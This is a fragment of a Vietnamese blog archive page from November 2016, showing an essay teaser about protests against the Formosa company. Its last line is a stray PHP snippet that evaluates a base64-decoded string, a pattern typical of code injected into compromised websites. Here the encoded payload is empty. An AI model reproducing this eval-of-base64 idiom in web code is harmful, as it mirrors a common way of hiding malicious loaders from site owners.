Archive for November 1st, 2016

KHÔNG GÌ THIÊNG LIÊNG HƠN TỔ QUỐC

KHÔNG GÌ THIÊNG LIÊNG HƠN TỔ QUỐC

Suốt sáu tháng qua, nhất là từ cuối tháng Bảy đến đầu tháng Mười, phong trào chống Formosa bùng nổ lớn bằng các cuộc biểu tình với sự tham gia của nhiều ngàn đồng bào các tỉnh bị ảnh hưởng. So với các cuộc biểu tình chống

11.1.2016 | Tiểu Luận- Chính Luận |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>